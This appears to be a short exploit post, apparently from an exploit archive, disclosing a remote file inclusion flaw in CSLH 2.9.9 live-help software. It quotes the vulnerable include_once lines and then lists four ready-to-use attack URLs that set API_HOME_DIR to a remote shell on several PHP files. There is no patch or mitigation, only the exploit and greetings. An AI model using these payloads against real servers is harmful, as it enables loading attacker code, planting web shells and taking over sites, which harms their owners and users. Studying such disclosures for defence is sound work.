######################################################### CSLH2.9.9 Remote File Include Vulnerabilities ######################################################### By Crackers_Child crackers_child@sibersavascilar.com www.sibersavacilar.com ######################################################### Download Script http://craftysyntax.com/CSLH2.9.9.zip ######################################################### ######################################################### Bug include_once(API_HOME_DIR . "util.php"); include_once(API_HOME_DIR . "const.php"); include_once(API_HOME_DIR . "stringparser.php"); ######################################################### Exploit ######################################################### www.site.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll? www.site.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll? www.site.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll? www.site.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll? ######################################################### Greetz:All My Friends ! #########################################################